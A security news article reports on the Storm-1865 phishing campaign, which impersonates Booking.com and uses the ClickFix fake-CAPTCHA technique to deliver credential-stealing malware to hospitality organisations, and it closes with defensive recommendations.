Phishing Campaign Impersonates Booking.com, Plants Malware

Published

eSecurity Planet content and product recommendations are editorially independent. We may make money when you click on links to our partners. Learn More.

A recent phishing campaign has raised alarms among cybersecurity professionals after it impersonated Booking.com to deliver a suite of credential-stealing malware.

First detected in December 2024 and persisting into early 2025, the threat targets hospitality organizations across North America, Oceania, Asia, and Europe. Using an insidious social engineering method called ClickFix, attackers manipulate users into unwittingly executing malicious commands, leading to extensive data theft and financial fraud.

The anatomy of the attack

The campaign employs a multi-layered approach, starting with deceptive emails that appear to originate from Booking.com. Here’s what comes next:

  1. These emails lure victims with urgent requests, from resolving guest review issues to verifying account information. 
  2. The phishing messages include links or attachments that direct users to fake Booking.com pages. 
  3. Once on these pages, a fake CAPTCHA overlay employs the ClickFix technique — users are tricked into copying and executing a command in the Windows Run window. 
  4. This command, executed via mshta.exe, downloads and launches various malware families, such as XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. 

Each malware variant is designed to capture sensitive credentials and financial information, making them potent tools for cybercriminals.

ClickFix: A tactic to bypass traditional defenses

ClickFix capitalizes on human error by presenting victims with seemingly routine error messages. These prompts compel users to engage in actions that bypass standard automated security checks, allowing malware to slip through defenses. 

The ease with which these malicious payloads are delivered underscores the sophistication of the campaign. Microsoft’s threat intelligence team, which labels this campaign Storm-1865, emphasizes that the attackers have refined their techniques over time, evolving from previous phishing schemes targeting hotel guests and online shoppers.

Implications for organizations

This evolving threat highlights the importance of robust cybersecurity awareness and defensive measures for organizations. Here’s what enterprises — particularly those in the hospitality sector can do:

  • Invest in comprehensive user education programs to help staff recognize phishing attempts. 
  • Implement phishing-resistant authentication methods and multi-factor authentication (MFA) across all access points. 
  • Deploy advanced threat detection tools, such as Microsoft Defender for Endpoint and Office 365, to identify and neutralize suspicious activities before significant damage occurs. 

As phishing tactics evolve, staying ahead of adversaries with updated threat intelligence and continuous employee training is crucial to minimizing risk and protecting sensitive data.

To further fortify your security measures, learn about spear phishing, which targets individuals or specific groups in an organization, and how you can avoid it.

Next article

Sunny Yadav Avatar

Subscribe to Cybersecurity Insider

Strengthen your organization’s IT security defenses by keeping abreast of the latest cybersecurity news, solutions, and best practices.

This field is required This field is required

Get the free Cybersecurity newsletter

Strengthen your organization’s IT security defenses with the latest news, solutions, and best practices. Delivered every Monday, Tuesday and Thursday

This field is required This field is required